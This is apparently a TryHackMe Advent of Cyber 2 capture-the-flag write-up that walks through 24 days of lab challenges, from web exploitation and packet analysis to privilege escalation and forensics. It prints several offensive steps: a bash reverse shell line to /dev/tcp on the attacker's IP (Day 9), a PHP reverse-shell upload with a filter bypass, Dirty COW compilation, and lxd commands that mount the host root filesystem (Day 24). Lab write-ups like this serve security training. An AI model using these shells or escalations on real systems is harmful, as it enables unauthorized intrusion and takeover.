CTF-Writeups/TryHackMe/AOC2.md

TryHackMe-Advent Of Cyber 2

[Day 1] Web Exploitation A Christmas Crisis

Register with a username and password then login

Next look for a cookie by pressing F12 then navigating to Storage

Tasks

1. What is the name of the cookie used for authentication?

auth

2. In what format is the value of this cookie encoded? hexadecimal

3. Having decoded the cookie, what format is the data stored in? JSON

4. What is the value of Santa's cookie?

Now copy the cookie and decode it from hex then edit the username to santa then encode it back to hex.

Turn all swtiches on and then you'll get your flag for day 1.

[Day 2] Web Exploitation The Elf Strikes Back!

Here we can see that it is telling us to enter ID with id parameter

ID that is given to us is ODIzODI5MTNiYmYw

Here it's indicating us to uplad a file so we can try to upload php reverse shell to get remote code execution to that get a php reverse shell

https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

Then change the IP , it's upto you to change the port or leave it as it is

Tasks

1. What string of text needs added to the URL to get access to the upload page?

?id=ODIzODI5MTNiYmYw

2. What type of file is accepted by the site?

We can see from the source code of the page that there are 3 exetensions that are accepted .jpeg , .jpg and .png which are extensions of image

image

3. Bypass the filter and upload a reverse shell.

Change the extenion of the reverse shell from .php to .jpeg.php

4. In which directory are the uploaded files stored?

Now we can guess the directory where files are uploaded it can be upload or uploads but here uploads work

OR

Use directory brute force , for some reason not all tools work for example gobuster was findning redirects but dirsearch worked perfectly and gave us the upload directory

In order to get gobuster working

https://infinitelogins.com/2020/09/05/dealing-gobuster-wildcard-and-status-code-errors/

5. Activate your reverse shell and catch it in a netcat listener! Head over to the uploads directory click your php reverse shell and you'll get a shell if you set up your net cat listner properly by nc -lvp <port>

6. What is the flag in /var/www/flag.txt?

[Day 3] Web Exploitation Christmas Chaos

For the day 3 we have a web page which is a login page

By looking at the source

We have name for password which is password and for username is username

Also we have the usernames and passwords

Usernames

admin
root
user

Passsword

password
admin
12345

Let's fire up burp suite

Caputure the request and send it to intruder

Set attack type to Cluster Bomb by default usernames and passwords have markers set for payload

Payload 1 is for usernames

Payload 2 is for passwords

Here we can see the length changes means that there might be a change in the content of the web page

Alternatively we can use hyda to brute force the login credentials

Let's try logging in with those credentials

[Day 4] Web Exploitation Santa's Watching

By looking at the source code we can't find anything here so let's brute force directory

We find /api directory in that we find a file

1. Given the URL "http://shibes.xyz/api.php", what would the entire wfuzz command look like to query the "breed" parameter using the wordlist "big.txt" (assume that "big.txt" is in your current directory)

wfuzz -c -z file.big.txt http://shibes.xyz/api.php\?breed=\FUZZ

2. Use GoBuster to find the API directory. What file is there?

site-log.php

3. Fuzz the date parameter on the file you found in the API directory. What is the flag displayed in the correct post?

Save the date wordlist from the room and fuzz with that list

Head over to that php file with that parameter and you'll get your flag

[Day 5] Web Exploitation Someone stole Santa's gift list!

By looking at the hint we can find the directory

Now in order to by pass the login we have to use SQLi (SQL Injection).

Start burpsuite capture that request on that page and send it to sqlmap

1. Without using directory brute forcing, what's Santa's secret login panel?

santapanel

2. Visit Santa's secret login panel and bypass the login using SQLi

No answer needed

3. How many entries are there in the gift database?

22

4. What did Paul ask for?

github ownership

5. What is the flag?

[redacted flag]

6. What is admin's password?

EhCNSWzzFP6sc7gB

[Day 6] Becareful with what you wish on Christmas night

From the dossier which the room gave us tells about what is XSS it's types and how we can mitigate it also tells a story about the web app that how the attacker exlploited so by reading all that we can answer the questions

1. What vulnerability type was used to exploit the application? Stored Cross-site scripting

2. What query string can be abused to craft a reflected XSS?

We can see the parameter in search query is q

so answer is q

3. Launch the OWASP ZAP Application

No answer needed

4. Run a ZAP (zaproxy) automated scan on the target. How many XSS alerts are in the scan?

2

5. Explore the XSS alerts that ZAP has identified, are you able to make an alert appear on the "Make a wish" website?

##[Day 7] Networking The Grinch Really Did Steal Christmas

1. Open "pcap1.pcap" in Wireshark. What is the IP address that initiates an ICMP/ping?

icmp

2. If we only wanted to see HTTP GET requests in our "pcap1.pcap" file, what filter would we use?

http.request.method == GET

3. Now apply this filter to "pcap1.pcap" in Wireshark, what is the name of the article that the IP address "10.10.67.119" visited?

/reindeer-of-the-week/

4. Let's begin analysing "pcap2.pcap". Look at the captured FTP traffic; what password was leaked during the login process?

Follow tcp stream of packet 14

plaintext_password_fiasco

5. Continuing with our analysis of "pcap2.pcap", what is the name of the protocol that is encrypted?

ssh

6. Analyse "pcap3.pcag" and recover Christmas!, What is on Elf McSkidy's wishlist that will be used to replace Elf McEager?

Now go to File->Export Objects->HTTP

Now read the contents of the elf_mcskidy_wishlist.txt

rubber ducky

##[Day 8] What's Under the Christmas Tree

1. When was Snort created?

Search on google about snort

1998

2. Using Nmap on 10.10.43.247, what are the port numbers of the three services running? (Please provide your answer in ascending order/lowest -> highest, separated by a comma)

80,2222,3389

3. Use Nmap to determine the name of the Linux distribution that is running, what is reported as the most likely distribution to be running?

Ubuntu

4. Use Nmap's Network Scripting Engine (NSE) to retrieve the "HTTP-TITLE" of the webserver. Based on the value returned, what do we think this website might be used for?

blog

[Day 9] Networking Anyone can be Santa!

From the nmap scan we can see that ftp anonymous login is enabled

Here you can either download the important files or you can just grab everything there by recusrively download everything

1. Name the directory on the FTP server that has data accessible by the "anonymous" user public

2. What script gets executed within this directory?

backup.sh

3. What movie did Santa have on his Christmas shopping list?

The Polar Express

4. Re-upload this script to contain malicious data (just like we did in section 9.6. Output the contents of /root/flag.txt!

No we know that a script backup.sh is running so let's create a script with a bash reverse shell

bash -i >& /dev/tcp/Your_TryHackMe_IP/4444 0\>&1

Setup a netcat listener

[Day 10] Networking Don't be selfish

1. Using enum4linux, how many users are there on the Samba server (10.10.215.162)?

3 2. Now how many "shares" are there on the Samba server? 4

3. Use smbclient to try to login to the shares on the Samba server (10.10.215.162). What share doesn't require a password?

tbfc-santa

4. Log in to this share, what directory did ElfMcSkidy leave for Santa?

jingle-tunes

[Day 11] Networking The Rouge Gnome

We login through ssh with credentials cmnatic:aoc2020 which are provide to us in the room

Run a find command for suid permissions which are identifed by 4000

Here we can find /bin/bash having a SUID so we can run this as root without specifying sudo

1. What type of privilege escalation involves using a user account to execute commands as an administrator?

vertical

2. What is the name of the file that contains a list of users who are apart of the sudo group?

sudoers

3. What are the contents of the file located at /root/flag.txt?

[redacted flag]

[Day 12] Networking Read,set,elf

Since this a windows box so it won't respond to ping (ICMP messages) so , try it like this

nmap -Pn -sC -sV <machine_ip>

Nmap scan report for 10.10.99.103
Host is up (0.45s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: TBFC-WEB-01
|   NetBIOS_Domain_Name: TBFC-WEB-01
|   NetBIOS_Computer_Name: TBFC-WEB-01
|   DNS_Domain_Name: tbfc-web-01
|   DNS_Computer_Name: tbfc-web-01
|   Product_Version: 10.0.17763
|_  System_Time: 2020-12-12T17:42:01+00:00
| ssl-cert: Subject: commonName=tbfc-web-01
| Not valid before: 2020-11-27T01:29:04
|_Not valid after:  2021-05-29T01:29:04
|_ssl-date: 2020-12-12T17:42:07+00:00; 0s from scanner time.
8009/tcp open  ajp13         Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http          Apache Tomcat 9.0.17
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.17
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

1. What is the version number of the web server?

From the nmap result we can find the web server version which is

9.0.17

2. What CVE can be used to create a Meterpreter entry onto the machine? (Format: CVE-XXXX-XXXX) Searching on goolge we'll find the CVE for the exploit in apache tomcat v 9.0.17

3. Set your Metasploit settings appropriately and gain a foothold onto the deployed machine.

We are given a script that it exists in the directory /cgi-bin/

4. What are the contents of flag1.txt [Readcated Flag]

5. Looking for a challenge? Try to find out some of the vulnerabilities present to escalate your privileges!

You can run the metasploit exploit suggester

Bonus

You can log into the system via RDP by adding a user and password and putting into local group adminstrator to do that

run getgui -u [USER_NAME] -p [PASS]

[Day 13] Special by John Hammond Coal for Christmas

Run the nmap scan on the machine

Nmap scan report for 10.10.124.226
Host is up (0.41s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
|   2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
|_  256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
23/tcp  open  telnet  Linux telnetd
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          39894/udp   status
|   100024  1          53070/tcp6  status
|   100024  1          53853/tcp   status
|_  100024  1          54547/udp6  status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.65 seconds

1. What old, deprecated protocol and service is running?

telnet

2. What credential was left for you?

Connect to telnet

clauschristmas

3. What distribution of Linux and version number is this server running?

Ubuntu 12.04

4. Who got here first?

Grinch

5. What is the verbatim syntax you can use to compile, taken from the real C source code comments?

Visit https://dirtycow.ninja/ to grab the diry cow exploit

gcc -pthread dirty.c -o dirty -lcrypt

6. Privilege Escalation ,Run the commands to compile the exploit, and run it.

Transfer the dirty cow exploit that you grab the internet with python http server

Compile the dirty.c file

Run the dirty compiled file

Now read message_from_the_grinch.txt in root directory

It says to create coal file then use tree command to list files in a tree and pipe that into md5sum to get a hash

This generate md5 hash is our flag 8b16f00dd3b51efadb02c1df7f8427cc.

[Day 14] Special by TheCyberMentor Where's Rudolph ?

1. What URL will take me directly to Rudolph's Reddit comment history?

Doing a simple search on google with the username that is given to us

https://www.reddit.com/user/IGuidetheClaus2020/comments/

2. According to Rudolph, where was he born?

Reading his comments we can then answer these questions

Chicago

3. Rudolph mentions Robert. Can you use Google to tell me Robert's last name?

May

4. On what other social media platform might Rudolph have an account?

Rudolph mentions about twitter so by googling his reddit username for twitter

Twitter

5. What is Rudolph's username on that platform?

As answered from the previous question , we can open the link to see his twtiter handler

IGuideClaus2020

6. What appears to be Rudolph's favorite TV show right now?

Going through his tweets

Bachelorette

7. Based on Rudolph's post history, he took part in a parade. Where did the parade take place?

On reverse searching imgae through google

Chicgao

8. Okay, you found the city, but where specifically was one of the photos taken?

Go through his tweets and find a higher resolution image

Upload it too online exif tool

41.891815, -87.624277

9. Did you find a flag too?

{FLAG}ALWAYSCHECKTHEEXIFD4T4

10. Has Rudolph been pwned? What password of his appeared in a breach?

We can find his email on his twitter bio

spygame

11. Based on all the information gathered. It's likely that Rudolph is in the Windy City and is staying in a hotel on Magnificent Mile. What are the street numbers of the hotel address?

From the coordinates found from the image on exif ,search them on google map

Serch for nearby hotels

540

[Day 15] Scripting There's a Python in my stocking !

1. What's the output of True + True?

Here True in programming means 1 and False means 0 so it basically is doing 1+1 which is 2

2

2. What's the database for installing other peoples libraries called?

PyPI

3. What is the output of bool("False")?

It gives the ouput True because bool returns true for an argument that is True here we are passing a string value "False"

True

4. What library lets us download the HTML of a webpage?

You could just google the two libraries that are used in example

Requests

5. What is the output of the program provided in "Code to analyse for Question 5" in the task's material (above the Christmas banner and below the links in the main body of this task?)

[1, 2, 3, 6]

6. What causes the previous task to output that?

The result is not the value which is in x because in python whenever we assign a variable value to another variable (sounds confusing) it passes it's value by a reference in the memory means whatever the changes will be made to y will affect x

Pass By Reference

[Day 16] Scripting Help! Where is Santa?

NMAP

nmap -Pn 10.10.9.148

  
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-16 22:40 PKT
Nmap scan report for 10.10.9.148
Host is up (0.42s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE
8000/tcp open  http-alt

1. What is the port number for the web server?

8000

2. Without using enumerations tools such as Dirbuster, what is the directory for the API? (without the API key)

On ruuning the script we create using BeautifulSoup library for web scrapping

Here find <a href="http://machine_ip/api/api_key">Modular modern free</a>

So found the api directory

/api/

3. Where is Santa right now?

Winter Wonderland, Hyde Park, London

4. Find out the correct API key. Remember, this is an odd number between 0-100. After too many attempts, Santa's Sled will block you.

   To unblock yourself, simply terminate and re-deploy the target instance (MACHINE_IP)

57

[Day 17] Reverse Engineering ReverseELFneering

SSH into the machine with credentials provided

Run radare2 and analyze the binary for functions with aa

Then we do pdf @main which is print disassembly function and then the function name with @

1. What is the value of local_ch when its corresponding movl instruction is called (first if multiple)?

We can see next to the instruction the value

1

2. What is the value of eax when the imull instruction is called?

So it's mulitplying the two values we have mov eax , dword [local_ch] -> 6 * 1 6

3. What is the value of local_4h before eax is set to 0?

Following the above instructions eax holds value 6 and the instruction is

mov dword [local_4h],eax

So it's transfer value of eax to local_4h

6

[Day 18] Reverse Engineering The Bits of Christmas

NMAP

nmap -Pn -sC -sV 10.10.63.64                         
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-18 23:23 PKT
Nmap scan report for 10.10.63.64
Host is up (0.43s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: TBFC-CMN-RE2
|   NetBIOS_Domain_Name: TBFC-CMN-RE2
|   NetBIOS_Computer_Name: TBFC-CMN-RE2
|   DNS_Domain_Name: tbfc-cmn-re2
|   DNS_Computer_Name: tbfc-cmn-re2
|   Product_Version: 10.0.17763
|_  System_Time: 2020-12-18T18:24:30+00:00
| ssl-cert: Subject: commonName=tbfc-cmn-re2
| Not valid before: 2020-12-16T17:42:47
|_Not valid after:  2021-06-17T17:42:47
|_ssl-date: 2020-12-18T18:24:31+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.53 seconds

Login to RDP with the credentials then launch Dotpeek and open the TBFC_APP

You'll see CrackMe on the assembly explorer

Expand the CrackMe and analyze Dispose(boolA_):void

1. What is Santa's password?

santapassword321

2. Now that you've retrieved this password, try to login...What is the flag?

[Day 19] Special by Tib3rius The Naughty or Nice List

Access the web server which is running locally

http://10.10.206.196/?proxy=http://list.hohoho.localtest.me

We will be given the password Be good for goodness sake!

Login with the username Santa and the password we found

Then just click on the button and it will give you the flag

[Day 20] Blue Teaming PowershELlF to the rescue

Host is up (0.44s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: ELFSTATION1
|   NetBIOS_Domain_Name: ELFSTATION1
|   NetBIOS_Computer_Name: ELFSTATION1
|   DNS_Domain_Name: elfstation1
|   DNS_Computer_Name: elfstation1
|   Product_Version: 10.0.17763
|_  System_Time: 2020-12-21T13:57:11+00:00
| ssl-cert: Subject: commonName=elfstation1
| Not valid before: 2020-11-25T19:32:43
|_Not valid after:  2021-05-27T19:32:43
|_ssl-date: 2020-12-21T13:57:13+00:00; 0s from scanner time.

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 771.79 seconds

Login to the windows box throguh ssh with the provided credentials

Then enter the command powershell to launch powershell within the terminal

1. Search for the first hidden elf file within the Documents folder. Read the contents of this file. What does Elf 1 want?

2. Search on the desktop for a hidden folder that contains the file for Elf 2. Read the contents of this file. What is the name of that movie that Elf 2 wants?

3. Search the Windows directory for a hidden folder that contains files for Elf 3. What is the name of the hidden folder? (This command will take a while)

4. How many words does the first file contain?

5. What 2 words are at index 551 and 6991 in the first file?

6. This is only half the answer. Search in the 2nd file for the phrase from the previous question to get the full answer. What does Elf 3 want? (use spaces when submitting the answer)

[Day 21] Blue Teaming Time for some ELForensics

Login to the machine through RDP with the given credentials

1. Read the contents of the text file within the Documents folder. What is the file hash for db.exe?

2. What is the file hash of the mysterious executable within the Documents folder?

3. Using Strings find the hidden flag within the executable?

4. What is the flag that is displayed when you run the database connector file?

On running deebee.exe executable

Launch this command to get the hidden stream of executable

Now the we know the hidden stream we want to use wmic to execute it with the hidden stream

[Day 22] Blue Teaming Elf McEager becomes CyberElf

Host is up (0.46s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: ELFSTATION3
|   NetBIOS_Domain_Name: ELFSTATION3
|   NetBIOS_Computer_Name: ELFSTATION3
|   DNS_Domain_Name: elfstation3
|   DNS_Computer_Name: elfstation3
|   Product_Version: 10.0.17763
|_  System_Time: 2020-12-22T16:04:40+00:00
| ssl-cert: Subject: commonName=elfstation3
| Not valid before: 2020-11-28T23:32:54
|_Not valid after:  2021-05-30T23:32:54
|_ssl-date: 2020-12-22T16:04:41+00:00; -1s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.23 seconds

Login to the box throguh RDP with the credentials

1. What is the password to the KeePass database?

Looking at the base64 encoded folder name when we decode it

This will be the decoded message which is the master key for KeePass database.

2. What is the encoding method listed as the 'Matching ops'?

base64

3. What is the decoded password value of the Elf Server?

4. What is the decoded password value for ElfMail?

5. Decode the last encoded value. What is the flag?

[Day 23] Blue Teaming The Grinch strikes again!

Use RDP to login to the windows machine with the given creds.

1. Decrypt the fake 'bitcoin address' within the ransom note. What is the plain text value?

2. At times ransomware changes the file extensions of the encrypted files. What is the file extension for each of the encrypted files?

3. What is the name of the suspicious scheduled task?

4. Inspect the properties of the scheduled task. What is the location of the executable that is run at login?

5. There is another scheduled task that is related to VSS. What is the ShadowCopyVolume ID?

6. Assign the hidden partition a letter. What is the name of the hidden folder?

Assign partiion letter to it

7. Right-click and inspect the properties for the hidden folder. Use the 'Previous Versions' tab to restore the encrypted file that is within this hidden folder to the previous version. What is the password within the file?

[Day 24] Special by DarkStar The Trial Before Christmas

Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-25 00:24 PKT
Nmap scan report for 10.10.6.114
Host is up (0.41s latency).
Not shown: 998 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
65000/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Light Cycle

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.86 seconds

1. Scan the machine. What ports are open?

80, 65000

2. What's the title of the hidden website? It's worthwhile looking recursively at all websites on the box for this step.

Light Cycle

3. What is the name of the hidden php page?

4. What is the name of the hidden directory where file uploads are saved?

Make sure to have burp suite to intercept js files

Remove the js extension from here

Rename the php reverse shell to .png.php

Turn on intercept on burp suite and press ctrl+F5 to referesh the web page to catch the request

Hit forward

Hit forward again

Drop the request because you want the filter.js to be dropped in order to by pass it.

5. What is the value of the web.txt flag?

6. Review the configuration files for the webserver to find some useful loot in the form of credentials. What credentials do you find? username:password

7. Access the database and discover the encrypted credentials. What is the name of the database you find these in?

8. Crack the password. What is it?

9. What is the value of the user.txt flag?

10. Check the user's groups. Which group can be leveraged to escalate privileges?

11. What is the value of the root.txt flag?

Now in order to escalate privleges we have to get lxd-alpine-builder.git on our local machine

Make sure you are doing this in you root directory

Tranfer the tar file on the target machine through wget,python http server or using netcat. I used netcat.

Now run these commands

lxc image import ./alpine-v3.12-x86_64-20201225_0216.tar.gz --alias myimage
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

Then navigate to /mnt/root/root